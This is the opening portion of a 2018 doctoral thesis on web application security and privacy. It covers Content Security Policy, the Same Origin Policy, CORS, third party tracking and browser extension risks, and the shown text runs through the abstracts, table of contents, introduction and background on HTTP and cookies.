HAL Id: tel-01925851

https://hal.inria.fr/tel-01925851v2

Submitted on 15 Apr 2019

HAL is a multi-disciplinary open access

archive for the deposit and dissemination of sci-

entific research documents, whether they are pub-

lished or not. The documents may come from

teaching and research institutions in France or

abroad, or from public or private research centers.

L’archive ouverte pluridisciplinaire HAL, est

destinée au dépôt et à la diffusion de documents

scientifiques de niveau recherche, publiés ou non,

émanant des établissements d’enseignement et de

recherche français ou étrangers, des laboratoires

publics ou privés.

Web applications security and privacy

Dolière Francis Some

To cite this version:

Dolière Francis Some. Web applications security and privacy. Cryptography and Security [cs.CR].

Université Côte d’Azur, 2018. English. �NNT : 2018AZUR4085�. �tel-01925851v2�

Sécurité et vie privée dans les applications

web

Dolière Francis Somé

Université Côte d’Azur / Inria

Présentée en vue de l’obtention du grade de docteur en Informatique d’Université Côte d’Azur

Dirigée par : Tamara Rezk

Co-encadrée par : Nataliia Bielova

Soutenue le : 29 octobre 2018

Devant le jury, composé de :

Davide Balzarotti Professeur Eurecom

Nataliia Bielova Chercheur Inria

Stefano Calzavara Chercheur Università Ca' Foscari Venezia

Walid Dabbous Directeur de recherche Inria

Christoph Kerschbaumer Chercheur Mozilla

Nick Nikiforakis Professeur Assistant Stony Brook University

Tamara Rezk Chercheur Inria

Andrei Sabelfeld Professeur Chalmers University

Mike West Ingénieur Google

THÈSE DE DOCTORAT

Sécurité et vie privée dans les applications

web

Composition du jury

Rapporteurs :

Davide Balzarotti Professeur Eurecom

Andrei Sabelfeld Professeur Chalmers University

Examinateurs :

Stefano Calzavara Chercheur Università Ca' Foscari Venezia

Walid Dabbous Directeur de recherche Inria

Christoph Kerschbaumer Chercheur Mozilla

Mike West Ingénieur Google

Invité :

Nick Nikiforakis Professeur Assistant Stony Brook University

Co-directeur de thèse:

Nataliia Bielova Chercheur Inria

Directeur de thèse:

Tamara Rezk Chercheur Inria

Résumé

Dans cette thèse, nous nous sommes intéressés aux problématiques de sécurité et de

confidentialité liées à l’utilisation d’applications web et à l’installation d’extensions de

navigateurs. Parmi les attaques dont sont victimes les applications web, il y a celles très

connues de type XSS (ou Cross-Site Scripting). Les extensions sont des logiciels tiers que les

utilisateurs peuvent installer afin de booster les fonctionnalités des navigateurs et améliorer

leur expérience utilisateur.

Content Security Policy (CSP) est une politique de sécurité qui a été proposée pour

contrer les attaques de type XSS. La Same Origin Policy (SOP) est une politique de

sécurité fondamentale des navigateurs, régissant les interactions entre applications web. Par

exemple, elle ne permet pas qu’une application accède aux données d’une autre application.

Cependant, le mécanisme de Cross-Origin Resource Sharing (CORS) peut être implémenté

par des applications désirant échanger des données entre elles.

Tout d’abord, nous avons étudié l’intégration de CSP avec la Same Origin Policy (SOP)

et démontré que SOP peut rendre CSP inefficace, surtout quand une application web

ne protège pas toutes ses pages avec CSP, et qu’une page avec CSP imbrique ou est

imbriquée dans une autre page sans ou avec un CSP différent et inefficace. Nous avons

aussi élucidé la sémantique de CSP, en particulier les différences entre ses 3 versions, et

leurs implémentations dans les navigateurs. Nous avons ainsi introduit le concept de CSP

sans dépendances qui assure à une application la même protection contre les attaques,

quelque soit le navigateur dans lequel elle s’exécute. Finalement, nous avons proposé et

démontré comment étendre CSP dans son état actuel, afin de pallier à nombre de ses

limitations qui ont été révélées dans d’autres études.

Les contenus tiers dans les applications web permettent aux propriétaires de ces contenus de

pister les utilisateurs quand ils naviguent sur le web. Pour éviter cela, nous avons introduit

une nouvelle architecture web qui une fois déployée, supprime le pistage des utilisateurs.

Dans un dernier temps, nous nous sommes intéressés aux extensions de navigateurs. Nous

avons d’abord démontré que les extensions qu’un utilisateur installe et/ou les applications

web auxquelles il se connecte, peuvent le distinguer d’autres utilisateurs. Nous avons

aussi étudié les interactions entre extensions et applications web. Ainsi avons-nous trouvé

plusieurs extensions dont les privilèges peuvent être exploités par des sites web afin d’accéder

à des données sensibles de l’utilisateur. Par exemple, certaines extensions permettent à

des applications web d’accéder aux contenus d’autres applications, bien que cela soit

normalement interdit par la Same Origin Policy. Finalement, nous avons aussi trouvé qu’un

grand nombre d’extensions a la possibilité de désactiver la Same Origin Policy dans le

navigateur, en manipulant les entêtes CORS. Cela permet à un attaquant d’accéder aux

données de l’utilisateur dans n’importe qu’elle autre application, comme par example ses

mails, son profile sur les réseaux sociaux, et bien plus. Pour lutter contre ces problèmes, nous

préconisons aux navigateurs un système de permissions plus fin et une analyse d’extensions

plus poussée, afin d’alerter les utilisateurs des dangers réels liés aux extensions.

Mots-clés : web, navigateurs, applications web, securité, same-rigin policy, content security

policy, cross-origin resource sharing, extensions de navigateurs, communication inter-iframes,

confidentialité, vie privée, pistage, empreinte de navigateurs

Abstract

In this thesis, we studied security and privacy threats in web applications and browser

extensions. There are many attacks targeting the web of which XSS (Cross-Site Scripting)

is one of the most notorious. Third party tracking is the ability of an attacker to benefit

from its presence in many web applications in order to track the user has she browses the

web, and build her browsing profile. Extensions are third party software that users install

to extend their browser functionality and improve their browsing experience. Malicious or

poorly programmed extensions can be exploited by attackers in web applications, in order

to benefit from extensions privileged capabilities and access sensitive user information.

Content Security Policy (CSP) is a security mechanism for mitigating the impact of content

injection attacks in general and in particular XSS. The Same Origin Policy (SOP) is a

security mechanism implemented by browsers to isolate web applications of different origins

from one another.

In a first work on CSP, we analyzed the interplay of CSP with SOP and demonstrated that

the latter allows the former to be bypassed. Then we scrutinized the three CSP versions and

found that a CSP is differently interpreted depending on the browser, the version of CSP

it implements, and how compliant the implementation is with respect to the specification.

To help developers deploy effective policies that encompass all these differences in CSP

versions and browsers implementations, we proposed the deployment of dependency-free

policies that effectively protect against attacks in all browsers. Finally, previous studies

have identified many limitations of CSP. We reviewed the different solutions proposed in

the wild, and showed that they do not fully mitigate the identified shortcomings of CSP.

Therefore, we proposed to extend the CSP specification, and showed the feasibility of our

proposals with an example of implementation.

Regarding third party tracking, we introduced and implemented a tracking preserving ar-

chitecture, that can be deployed by web developers willing to include third party content

in their applications while preventing tracking. Intuitively, third party requests are auto-

matically routed to a trusted middle party server which removes tracking information from

the requests.

Finally considering browser extensions, we first showed that the extensions that users install

and the websites they are logged into, can serve to uniquely identify and track them. We

then studied the communications between browser extensions and web applications and

demonstrate that malicious or poorly programmed extensions can be exploited by web

applications to benefit from extensions privileged capabilities. Also, we demonstrated that

extensions can disable the Same Origin Policy by tampering with CORS headers. All this

enables web applications to read sensitive user information. To mitigate these threats, we

proposed countermeasures and a more fine-grained permissions system and review process

for browser extensions. We believe that this can help browser vendors identify malicious

extensions and warn users about the threats posed by extensions they install.

iii

Keywords: web, browser, web application, security, same origin policy, content secu-

rity policy, cross-origin resource sharing, browser extensions, cross-iframe communication,

privacy, third party web tracking, browser fingerprinting

Acknowledgements

MERCI

THANK YOU

BARKA

Contents

1 Introduction 1

1 Security threats .................................. 1

2 Privacy threats .................................. 2

3 Extensible browsers ................................ 3

4 Scope of the thesis ................................ 3

4.1 Improving the effectiveness of CSP ................... 3

4.2 Server-side third party tracking protection ............... 4

4.3 Web applications meet browser extensions ............... 5

5 Outline ...................................... 5

6 List of publications and submissions ...................... 6

2 Background 7

1 Web applications ecosystem ........................... 7

1.1 Web servers ................................ 7

1.2 HTTP protocol .............................. 8

1.3 Web documents .............................. 9

1.4 Cascading Style Sheets (CSS) ...................... 10

1.5 JavaScript ................................. 11

1.6 Browsing contexts ............................ 12

2 The Same Origin Policy ............................. 12

2.1 Origin ................................... 12

2.2 Cross-origin embeddings ......................... 13

2.3 Cross-origin reads ............................ 15

3 Cross-Origin Resource Sharing (CORS) .................... 16

3.1 Types of CORS requests: simple and preflighted ........... 16

3.2 CORS headers .............................. 17

3.3 CORS and sandboxing .......................... 19

4 Third party content in web applications .................... 20

4.1 Cross-Site Scripting (XSS) ........................ 20

4.2 Third party web tracking ........................ 21

5 Content Security Policy ............................. 22

5.1 Directives ................................. 22

5.2 Directive values .............................. 23

5.3 CSP modes and headers ......................... 25

5.4 Example of CSPs ............................. 26

6 Browser extensions ................................ 27

6.1 Security considerations .......................... 28

6.2 Architecture ................................ 28

6.3 Extensions injected content ....................... 29

vii

viii CONTENTS

6.4 Extensions identification ......................... 30

6.5 Web Accessible Resources ........................ 30

I Content Security Policy 33

3 CSP violations due to SOP 39

1 Introduction .................................... 39

2 Content Security Policy and SOP ........................ 40

2.1 CSP violations due to SOP ....................... 40

3 Empirical study of CSP violations ....................... 42

3.1 Methodology ............................... 43

3.2 Results on CSP adoption ........................ 45

3.3 Results on CSP violations due to SOP ................. 46

3.4 Responses of websites owners ...................... 49

4 Avoiding CSP violations ............................. 49

5 Inconsistent implementations .......................... 50

6 Conclusion ..................................... 52

4 Dependency-Free CSP 53

1 Introduction .................................... 53

2 Context and problems .............................. 56

2.1 Directives and their values in different CSP versions ......... 56

2.2 Problems with browsers support .................... 57

2.3 Goal: is my CSP effective? ....................... 58

3 Directives dependencies ............................. 59

3.1 CSP core syntax ............................. 59

3.2 Formalization of DF-CSP considering CSP1, CSP2, CSP3 and browsers

implementations ............................. 62

3.3 Rewriter for building DF-CSP for CSP1, CSP2, and CSP3 ...... 66

3.4 Resolving all Dependencies ....................... 67

3.5 Dependencies between CSP2 and CSP3 implementations ....... 69

3.6 Dependencies between CSP2 and CSP3 specifications ......... 70

4 Dependencies in the wild ............................. 72

4.1 Validity of the statistics ......................... 73

5 Tool for building effective policies ........................ 73

6DF-CSP and strict CSP .............................. 74

6.1 Attacker model .............................. 75

6.2 Design ................................... 75

6.3 Applications vulnerable to such attacks ................ 75

7 Conclusion ..................................... 76

5 Extending CSP 77

1 Introduction .................................... 77

2 Problem and motivation ............................. 81

2.1 Partially whitelisted origins ....................... 82

2.2 Excluding content from whitelisted origins ............... 82

2.3 URL parameters ............................. 82

2.4 CSP violations .............................. 82

2.5 Motivation ................................ 83

CONTENTS ix

3 Extending CSP specification ........................... 84

3.1 CSP in blacklisting mode ........................ 84

3.2 Checks on URL arguments ....................... 84

3.3 Preventing redirections .......................... 86

3.4 Reporting runtime enforcement of CSP ................. 86

3.5 Backwards compatibility and implementation overhead ........ 86

4 Implementation .................................. 87

4.1 Implementation of the URL filtering algorithm ............ 88

4.2 Implementation of the URL matching algorithm ........... 89

4.3 Service workers .............................. 89

5 Evaluation ..................................... 92

5.1 Performance overhead .......................... 93

6 Discussions and limitations ........................... 95

6.1 Service workers .............................. 95

6.2 Browser extensions ............................ 96

6.3 Privacy implications of the reporting mechanism ........... 96

7 Conclusion ..................................... 97

II Third party web tracking 99

6 Server-side tracking protection 105

1 Introduction ....................................105

2 Background and motivation ...........................106

2.1 Browsing context .............................107

2.2 Third party tracking ...........................108

3 Privacy-preserving web architecture .......................110

3.1 Rewrite Server ..............................111

3.2 Middle Party ...............................112

4 Implementation ..................................114

4.1 Discussion and limitations ........................115

5 Evaluation and Case Study ...........................115

6 Conclusion .....................................117

7 Browser extensions fingerprinting 119

1 Introduction ....................................119

2 Background ....................................121

2.1 Detection of browser extensions .....................121

2.2 Detection of web logins .........................122

3 Dataset ......................................123

3.1 Experiment website and data collection ................123

3.2 Data statistics ..............................124

3.3 Usage of extensions and logins .....................127

4 Uniqueness analysis ................................128

4.1 Four final datasets ............................129

4.2 Uniqueness results for final datasets ..................129

5 Fingerprinting attacks ..............................131

5.1 Threat model ...............................131

5.2 How to choose optimal attributes? ...................132

5.3 Targeted fingerprinting ..........................132

xCONTENTS

5.4 General fingerprinting ..........................133

6 Implementation and performance ........................135

7 The dilemma of privacy extensions .......................135

8 Countermeasures .................................137

9 Discussion and future work ...........................138

10 Conclusion .....................................139

III Browser Extensions 141

8 Communications extensions - web applications 147

1 Introduction ....................................147

2 Context ......................................149

2.1 Interactions ................................149

2.2 Threat models ..............................151

3 Methodology ...................................151

3.1 Static analysis ..............................152

3.2 Manual Analysis .............................154

3.3 Limitations ................................154

4 Empirical Study .................................154

4.1 Overview .................................155

4.2 Execute code ...............................158

4.3 Bypass SOP ................................158

4.4 Cookies ..................................159

4.5 Downloads ................................160

4.6 History, bookmarks, and list of installed extensions ..........160

4.7 Store/retrieve data ............................160

4.8 Other threats ...............................161

5 Tool for analyzing message passing APIs ....................161

6 Case study ....................................162

6.1 Example of messages to send to extensions ...............162

6.2 Forcing the attack ............................166

7 Discussion .....................................166

7.1 Browser vendors .............................167

7.2 Web applications developers .......................167

7.3 Extensions developers ..........................167

7.4 Extensions users .............................168

8 Conclusion .....................................168

9 Extensions and CORS 169

1 Introduction ....................................169

2 Background ....................................171

2.1 Threat model ...............................171

3CORSER extension .................................172

3.1 Permissions to manipulate HTTP headers ...............172

3.2 Background page .............................173

3.3 Deploying and testing CORSER ......................176

3.4 Publishing CORSER ............................177

4 Empirical study on CORS headers manipulations ...............177

4.1 Data collection and static analyzer ...................177

CONTENTS xi

4.2 Manual analysis ..............................178

4.3 Results overview .............................178

4.4 Breaking the Same Origin Policy ....................183

4.5 Breaking legitimate CORS requests ...................184

5 Discussions ....................................186

5.1 Disallowing security headers manipulations ..............186

5.2 Requesting permissions to manipulate security headers ........187

6 Countermeasures .................................188

6.1 Web applications servers .........................188

6.2 Extensions Users .............................188

6.3 Extensions Developers ..........................188

7 Conclusion .....................................188

10 Conclusion 191

A Appendix 195

List of Figures 207

List of Tables 209

List of tools and websites 211

Bibliography 213

Chapter 1

Introduction

Browsers are everywhere. Billions of devices such as personal computers, smartphone,

tablets, and even TVs connect to the Internet via powerful browsers, that are able to display

rich web applications. Differently from native applications, web applications remove the

burden for developers to provide a specific version of their applications for different devices.

This allows developers to reach almost any device and many more users. This is possible

because the web is based on standards supported by browsers and used by developers to

write their applications. Web standards such as HTML5, CUSS, JavaScript and HTTP

are powerful enough to enable the creation of web applications which have nothing to envy

of traditional web applications, in terms of features, functionality and performance. In

recent years, many applications such as Microsoft Office and Skype, that have dominated

the desktop applications landscape, are experiencing serious competition from alternatives

based on the web, and are themselves now moving to the web.

Long ago, websites were made of static content solely provided by the owner of the site.

Today web applications are interactive, and are made by reusing content and assembling

building blocks provided by third parties. Using third party content make it easy to

quickly build fully fledged web applications: a restaurant site can use Google Maps to

show its location to clients, link to a social network page for users to leave comments,

collect feedback from users directly in the site, or even monetize the site by displaying

third party advertisements to users.

Hence, part of the content that form web applications are also generated by users. By

creating accounts on web applications, users can leave comments which are displayed to

other users. They can interact and share content with one another.

1 Security threats

It is fundamental that the data a user entrusts to a web application does not get leaked

to a third party. The Same Origin Policy (SOP) [125] is a baseline security mechanism,

implemented by browsers, to ensure that websites they run cannot directly access each

other’s data: for instance, the user bank information is accessible only to the bank website,

and not to her email website and vice versa. To ensure that, each application executes in

a different browsing context. However, when an application embeds third party content in

its pages, say a script, then the third party content executes with the same privileges (in

the same context) as any other content provided by the owner of the application. In other

words, it has access to any data of the hosting application. It is then the responsibility of

the developer to ensure that it is safe to include such third party content in his website —

2CHAPTER 1. INTRODUCTION

that the third party is not leaking user data.

If third party content present in a website is usually included by the developer because she

trusts it, there are many attacks that can be leveraged by an attacker to inject malicious

content in web applications. One of the most prevalent of those attacks is Cross-Site

Scripting (XSS). An XSS attack occurs when an attacker is able to inject malicious content

in a vulnerable application via a comment text field for instance. When such content is

displayed to other users (going to the application to view the list of posted comments),

the attacker content (code) is also displayed. Since it is a code and not an expected

text content, the code is executed, with the same privileges as the code provided by the

application developer. The attacker can then take advantage of this position to access and

exfiltrate user data, leak user authentication cookies and mount session hijacking attacks in

order to take actions on the user’s behalf. To help mitigate XSS attacks in particular and

a broad range of content injection attacks in general, the World Wide Web Consortium

(W3C) introduced Content Security Policy (CSP) [275]. CSP makes it possible for a

developer to declare the origins of (trusted) content allowed to load in her application. At

runtime, content not whitelisted in the CSP of the application are blocked by the browser.

Thanks to CSP, the browser can block content injected by an attacker who exploited a

vulnerability in the website.

2 Privacy threats

The Hypertext Transfer Protocol (HTTP) used to exchange data between web browsers

and application servers is coined as being stateless. In other words, when a browser

connects to a server to retrieve some data, the server just handles the request, responds

with the appropriate content and forgets about the request it has just served and the

browser which made it. Cookies have been added to the protocol to make it stateful.

Cookies are sent by web servers, stored in the user browser and attached to future requests

to the same server, so that the server can link subsequent requests from the same browser.

The ability to store cookies in the user browser is primarily meant to (but not limited to)

first parties (web applications the user interacts with). Indeed, every third party content

that web applications embed can also use cookies in order for the third party content

provider to recognize the browser from which a request is being made to load the third

party content. Additionally, the browser automatically attaches to third party requests,

the first party application in which they are embedded. Combining cookies and the name of

the first party website allows a third party to build a browsing history for the specific user

(all the websites that include content from the third party content, and that the user has

visited). Many third parties serve content to numerous web applications, putting them in

a position where they can track many users as they browse the web. Tracking information

gathered by third parties can serve various purposes such as advertisement, or put the user

privacy at risk by revealing their health situation, political or religious views, interests, etc.

Another tracking scenario that has been extensively demonstrated in the literature is

browser fingerprinting. In this scenario, trackers collect the properties of the user browser

(for instance, the name, version of the browser and operating system, list of fonts and

plugins installed), build a fingerprint of her browser and store it on a server. When the

user visits another website, the tracker collects again the properties of her browser, and

compares it with the previously stored fingerprints in order to recognize and track the user.

3. EXTENSIBLE BROWSERS 3

3 Extensible browsers

Even though modern web browsers are powerful platforms able of executing all sorts of

simple to very complex web applications, most of them also provide mechanisms for users

to further extend and customize their browsers. One of the most currently widespread

mechanism for doing so is based on browser extensions or addons. The WebExtensions

API for instance, is a cross-browser extension API sported by major browsers including

Chrome, Firefox, Opera and Microsoft Edge. Nowadays, extensions are very widespread

among browsers. The Google Chrome Web Store has more than 60k extensions, and there

are hundreds to thousands of extensions available for other platforms. Many extensions are

already used by dozens of millions of users. Among those are adblockers and other privacy-

preserving extensions, more and more passwords managers and various helper extensions

for improving and easing users’ browsing experience. In contrast to plugins such as Adobe

Flash, Java Applets that are external native applications used by browsers to display non-

standard web content (Flash movies, Java applets), browser extensions however are third

party programs, tightly integrated to browsers, where they execute with elevated privileges.

For instance, unlike traditional web applications, they are not subject to the SOP, and

therefore can access user data on any web application, including applications where users

are logged into. Extensions can also intercept and tamper with HTTP communications

between web applications and web servers.

Due to their privileged nature, browsers extensions are the targets of many attacks that

put the security and privacy of users at risk. Compromising an extension gives an attacker

unlimited access to user data on any application, including sensitive information on any

application they are logged to.

For security reasons, browser extensions and web applications execute in separate contexts.

Web applications cannot access extensions privileged execution contexts. Extensions how-

ever have access to web applications execution contexts and in particular to their Document

Object Model (DOM), which they can manipulate. They can add, modify or remove ele-

ments from the DOM of web pages. Content they inject directly in the DOM of web pages

will be considered as part of the web application, thus executing with the same privileges

and accessing data in the application context. Apart from the DOM, extensions and web

applications can interact in various ways in order to exchange data via the localStorage,

or by setting up communication channels using postMessage-like APIs. Extensions can

also intercept and modify the headers of HTTP exchanges between web applications and

web servers. This include sensitive security critical headers such as the Cross-Origin Re-

source Sharing (CORS) ones, used in HTTP requests and responses to authorize or not

cross-domain requests.

4 Scope of the thesis

4.1 Improving the effectiveness of CSP

Content Security Policy is a page-specific policy. This means that when a web application

does not protect all its pages with a CSP, then instead of targeting the CSP-protected

pages, an attacker can target the non-protected ones. Once the attack succeeds, the SOP

allows the attacker to propagate this attack to all other pages of the application, including

those which are CSP-protected.

Since its introduction, CSP has experienced three major versions: the second version is

a W3C specification and the current third version is already in an advanced development

4CHAPTER 1. INTRODUCTION

state. New versions of CSP come with their set of features which were not present in previ-

ous versions and changes that alter the semantics of previous CSP versions. Furthermore,

different browsers support different versions of CSP. Even when they support the same ver-

sion, their implementations are not always compliant with the specification or even with

one another. In these settings, developers have to ensure that policies they deploy take

into consideration the peculiarities of each CSP version, and browsers implementations, so

that the CSPs provide the same security protection while preserving the functionality of

the application, in all browsers. To help developers cope with these intricacies, we formal-

ize the differences between CSP versions and browsers implementations, and propose and

prove a set of rewriting rules to effectively build policies which are independent of CSP

versions and browsers implementations.

Previous studies have shown the limitations of CSP at mitigating XSS attacks, because of

subtle bypasses such as JSONP and open redirects. We reviewed the previous solutions that

have been proposed and showed that they do not fully mitigate the identified shortcomings

of CSP. Therefore, we proposed to extend the CSP specification. We motivate the need for

a blacklisting mechanism in CSP, a URLs parameter filtering mechanism, new directives

for explicitly preventing redirections, and an efficient reporting mechanism for collecting

feedback of the runtime enforcement of CSP. We demonstrate the feasibility of our proposals

with an example of implementation.

4.2 Server-side third party tracking protection

Third party web tracking has attracted significant attention from the research community

the past years. Many mechanisms have been proposed to help mitigate them. We observe

that most of these solutions are focused on the client-side, proposed by browser vendors

in the form of settings for users to control third party cookies, browse in private and

other incognito modes, or in the form of privacy-preserving browser extensions provided

by developers. If some browsers enable some basic tracking protection features by default,

enabling more advanced ones is not always easily accessible to the average Internet user.

Furthermore, installing browser extensions is not easy to the majority of users. In other

words, these solutions are only effective for advanced users, leaving the vast majority of

them unprotected.

We propose a server-side third party web tracking protection mechanism. The design of

such a solution is challenging for many reasons: first of all, third party content are impor-

tant and many web applications in the wild cannot afford not using them. Nonetheless,

we argue that a developer embedding third party content is more interested in the con-

tent itself, rather than in the underlying tracking that can take place. As such, this is a

practice that developers may want to remove from third party content embedded in their

applications. Moreover, many web applications are already deployed, and a solution re-

quiring significant effort from developers to change their applications is likely going to not

be considered by the majority of them.

Considering these requirements, the solution we propose can be plugged to an already

existing web application, and does not prevent the developer from using third party content.

The system automatically rewrites the original pages of the application, in order to redirect

third party content requests to a middle party. There, any tracking information (cookies,

identification of the first party) is removed, and the request is forwarded to the third

party. In other words, the middle party anonymizes the requests and forwards them to

the third party. When the third party replies, the responses are also anonymized before

being returned to the browser. This makes it impossible for the third party to recognize

5. OUTLINE 5

the user’s browser initiating the request, and thus prevents third party web tracking.

4.3 Web applications meet browser extensions

Browsers supporting the WebExtensions API usually assign to each extension, a unique

identifier that distinguishes it from other extensions. Chrome and Opera assigns each ex-

tension a permanent identifier, which is the same in all user browsers. Firefox however

assigns a random identifier to the extension on a per-browser basis. Content that exten-

sions inject in web pages DOM can either be hosted on a remote server, or be located in

the extension package on the user browser. Content of extensions package that can be in-

jected in web pages are referred to as web accessible resources. Extensions identifiers,

web accessible resources and content that extensions inject in web pages can be used to

successfully discover extensions and fingerprint the user’s browser. Previous studies that

have quantified the fingerprintability of browser extensions have done so with rather lim-

ited user bases (less than a thousand). We performed an analysis of the fingerprintability

of users based on their set of extensions by analyzing the list of installed extensions from

more than 16k users. We also show that the websites to which users are logged into further

add to the uniqueness of users.

We analyzed the communications between browser extensions and web applications, and

discovered many extensions which privileged capabilities can be exploited by web applica-

tions in order for instance to bypass the SOP and access any other web application data,

evade user privacy preferences of not being tracked by storing data in extensions perma-

nent storage, access user browsing cookies, history, bookmarks, topsites, list of installed

extensions, or even download files and save them on the the user’s device.

Finally, we discussed the security implications of the ability of extensions to tamper with

HTTP headers, in particular security-critical headers such as those used in Cross-Origin

Resource Sharing (CORS) requests. In fact, by default, the SOP does not allow cross-origin

requests. CORS is a refinement of the Same Origin in which web servers can authorize

cross-origin requests by sending dedicated HTTP headers. An extension can basically

disable the SOP in browsers by appropriately tampering with CORS headers in cross-

origin requests. Consequently, by acting as man-in-the-middle, they can authorize any

unauthorized cross-origin requests, by allowing an attacker to transparently gather all user

data on any web application.

5 Outline

In the background Chapter 2, we describe concepts and technologies necessary to ease the

reader’s understanding of other chapters. The rest of the thesis is organized in 3 parts.

Part Idescribes works related to Content Security Policy. It is further divided in 3 chapters

describing CSP violations due to the Same Origin Policy (Chapter 3), dependencies in CSP

directives (Chapter 4), and extensions we propose to complement and extend CSP (Chap-

ter 5). Part II is related to third party web tracking and browser fingerprinting. Chapter 6

presents our work on server-side tracking prevention and Chapter 7discusses browser fin-

gerprinting based on browser extensions and web logins. Finally, Part III is dedicated to

works on the security and privacy implications of browser extensions. Chapter 8presents

our work analyzing the threats posed by the communications between browser extensions

and web applications, and Chapter 9discusses the implications of the Cross-Origin Re-

source Sharing (CORS) headers manipulations by browser extensions. Finally, Chapter 10

concludes.

PUT(0,-845.90042)

6CHAPTER 1. INTRODUCTION

6 List of publications and submissions

1. Dolière Francis Somé, Nataliia Bielova, and Tamara Rezk. On the content security

policy violations due to the same-origin policy. In Barrett et al. [171], pages 877–886

2. Dolière Francis Somé, Nataliia Bielova, and Tamara Rezk. Control what you include!

- server-side protection against third party web tracking. In Bodden et al. [174], pages

115–132

3. Gábor György Gulyás, Dolière Francis Somé, Nataliia Bielova, and Claude Castellu-

cia. To extend or not to extend: on the uniqueness of browser extensions and web

logins. In To appear in the Proceedings of the 2018 ACM on Workshop on Privacy in

the Electronic Society, WPES@CCS 2018, Toronto, Canada, October 15 - 19, 2018,

2018

4. Dolière Francis Somé and Tamara Rezk. DF-CSP: Dependency-Free Content Security

Policy. Submitted for review

5. Dolière Francis Somé and Tamara Rezk. Extending Content Security Policy: Black-

listing, URL arguments filtering and Monitoring. Submitted for review

6. Dolière Francis Somé. EmPoWeb: Empowering web applications with browser exten-

sions. Submitted for review

7. Dolière Francis Somé. Breaking the Same Origin Policy for free - On CORS headers

manipulations by browser extensions. Submitted for review

PUT(0,-845.90042)

Chapter 2

Background

This chapter introduces different concepts and technologies that are used throughout this

thesis. It presents the state-of-the-art of the these key concepts so as to ease the reader’s

understanding of the following chapters and works presented in this thesis.

1 Web applications ecosystem

Browsers are application platforms able of running web applications, that provide different

services to users. The web ecosystem is built on common standards, implemented both by

browser vendors and web applications developers. This makes it possible for any browser

to correctly render any website.

The web architecture is commonly referred to as a client-server architecture, where the

browser is the client and the server is the machine hosting the application. When a user

needs to interact with an application, the browser makes a request to the server hosting

it. The server responds with the application, which is then displayed to the user. The web

architecture can also be seen as a multi-tier system [192,247], where the browser is the first

or presentation tier and the web server represents the logic tier, associated to data tiers

which are usually databases where the server stores and manages the web application data.

To communicate with one another, the different tiers are connected to a common network,

usually the Internet, and support common communications protocols such as HTTP [1]

used for transmitting data among them.

1.1 Web servers

A web server is often wrongly referred to as the computer device (machine) hosting a

web application. Actually, a web server is itself an application running on a computer

device, connected to a network (usually the Internet), in order for the clients (browsers) to

communicate with the web server. Well-known web servers are Apache HTTP Server [9],

Microsoft Internet Information Services (IIS) [95] and Nginx [104]. Web servers support

a set of technologies for powering web applications. They usually support a programming

language used for generating webpages and handling requests from clients. These are called

server-side programming languages and include for instance PHP [113], ASP.NET [11],

Python [119], Node.js [105]. The server-side language can be used to serve static resources,

or dynamically generate resources and webpages on the fly, based on the characteristics

of a request. Web servers are also usually associated with databases used to manage web

applications and user data. Well known database management systems are MySQL [103],

PostgreSQL [115], Oracle [111], MongoDB [99].

PUT(0,-845.90042)

8CHAPTER 2. BACKGROUND

1.2 HTTP protocol

HTTP (HyperText Transfer Protocol) [1] is one of the most used protocols for the com-

munications between web browsers (clients) and web servers. It usually involves a request,

sent from the client (browser) to the server which processes the request and responds.

Among other things, HTTP requests carry information such as (i) the URL (Uniform Re-

source Locator) [144]1or web address of the resource to be accessed on the server; (ii)

a method (GET,POST,OPTIONS,HEAD, etc.) which indicates the action to be applied to

the resource; (iii) a list of key/value pair HTTP headers providing additional information

about the requests, and eventually (iv) data (request body) to be transmitted with the

requests. Similarly, HTTP responses from the server contain a status code (200, 404, etc.)

that indicates whether the requested resource is available or not, a list of response headers

and the response body (data).

Request headers

Host: www.google.com

User-Agent: Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:61.0) Gecko/20100101

Firefox/61.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Cookie: NID=1234

Response headers

Content-Type: text/html; charset=UTF-8

X-Frame-Options: SAMEORIGIN

Set-Cookie: JAR=abcd; expires=Thu, 21-Feb-2019 14:39:31 GMT; path=/; do-

main=.google.com; HttpOnly; Secure

Content-Security-Policy: default-src ’self’; frame-ancestors ’self’

Table 2.1 – HTTP headers (excerpt) exchanged between the browser (client) and the server

for an access to https://www.google.com

Table 2.1 shows an excerpt of HTTP headers exchanged between the browser and the

server for an access to https://www.google.com 2. Among the request headers are the

User-Agent header and its value Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:61.0)

Gecko/20100101 Firefox/61.0 which means that the user has a Mozilla Firefox version

61.0 browser running on a Linux (Fedora) computer. The browser is also transmitting

cookies (using the Cookie header) to the server. The content-type response header tells

that the accessed resource should be handled by the browser as an HTML content (that is

to say, a webpage).

HTTP communications are transmitted on the network unencrypted. This open up to man-

in-the-middle attacks [91], where an attacker can intercept and modify the communications

between a client and a server. HTTP protocol is then referred to as an insecure protocol.

HTTPS [75] is the secure counterpart of HTTP, where communications are encrypted

between the source and the destination. In this work, we often use HTTP to mean the

protocol in general including its insecure and secure counterparts.

HTTP cookies The HTTP protocol is coined as being stateless [73]. In other words,

when a browser connects to a server to retrieve some data, the server just handles the

1. URLs are translated into IP addresses

2. For the purposes of this work, some headers have been added and some header values changed

PUT(0,-845.90042)

1. WEB APPLICATIONS ECOSYSTEM 9

request, responds with the appropriate content and forgets about the request it has just

served and the browser which made it. Therefore the server will not make a link between

future requests from the same browser and previous ones [73]. However, most modern

applications rely on the ability to recognize the user’s browser that connect to the web

application servers. In this light, HTTP cookies have been introduced to make HTTP

stateful. A cookie is a piece of information (an identifier) sent by a server in an HTTP

header, i.e. Set-Cookie in Table 2.1, to be stored in a user browser and attached to

subsequent requests (using the Cookie header) between the browser and the server. The

first time a user visits a website, the server returns the requested data as well as the

cookies (using the Set-Cookie header). Later on, future requests to the same server will

automatically be attached the cookies previously stored by the server, allowing the latter

to recognize the user whose browser is connecting to the server. HTTP cookies have

made viable web applications such as e-commerce, and most of the web applications make

extensive use of cookies in order to provide their services to users. In a typical e-commerce

website for instance, a cookie is attached to a user browser, allowing the website to track

the list of items the user adds to her basket. On a social network website for example, once

a user is logged in (using her credentials, i.e. her username and password), the server will

store a cookie in the user’s browser and will no long ask for her credentials. Hence, each

time the user accesses a new page or service of the app, the cookie is used to authenticate

her, in order to authorize or not, the access. In Table 2.1 the browser is sending a cookie

previously stored by the server using the cookie request header.

